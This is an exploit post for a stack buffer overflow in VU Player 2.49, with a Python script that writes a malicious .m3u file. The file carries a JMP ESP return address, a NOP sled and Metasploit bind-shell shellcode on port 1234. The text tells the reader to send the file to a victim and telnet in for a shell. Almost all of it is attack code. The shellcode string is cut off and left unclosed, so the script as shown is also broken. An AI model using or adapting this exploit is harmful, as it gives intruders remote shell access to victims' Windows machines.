VU Player stack buffer overflow Local Exploit

This is VU player stack buffer overflow exploit.This is a local exploit.
When you run this exploit a malformes .m3u file will be generated.
Change the shell code accroding to your purpose.
The shell code i have added is bad character free windows_shell_bind_tcp generated from metasploit frmae work.
If you use this shell code,After victim open the malformed m3u,you just have to telnet thr victim on port 1234 to get shell.

I have submitted the code @ injector vulnerability database
you can also find it @
# Exploit Title: VU Player stack buffer overflow Local Exploit
# Version: 2.49
# Date: 22-08-2011
# Author: Debasish Mandal
# Email
# Software Link:
# Category:: Local
# Tested on: Windows XP SP2.

from struct import pack
print "######################################################"
print "##   VU Player Local BO Exploit                     ##"
print "## ##"
print "##   Author :: Debasish Mandal                      ##"
print "##   Email :                  ##"
print "##          ##"
print "######################################################"
raw_input("Press Enter to generate the crafted m3u...")
f = open('victim.m3u','w')
junk = "A"*1012
eip = pack('<L',0x77D7754A)  # JMP ESP @ USER32.dll
nop = "\x90" *10    # NOPs [To make the exploit smooth]

#Shell Code Starts Here
#List bad characters \x00  \x09   \x0a  \x1a
#Generated form Metasploit Framework
#Name : windows/shell/bind_tcp
#LPORT = 1234
shellcode = ("\xda\xc2\xd9\x74\x24\xf4\xbf\x97\xf8\x9b\xb0\x58\x29\xc9\xb1"
payload = (junk+eip+nop+shellcode)
print "[*]Writinng payload to the file victim.m3u"
print "[*]Crafted .m3u File generated"
print "[*]Now send the file to victim"
print "[*]Telnet to the victim on port 1234 after execution of this crafted m3u"
print "[*]Exit"

# [2011-08-22


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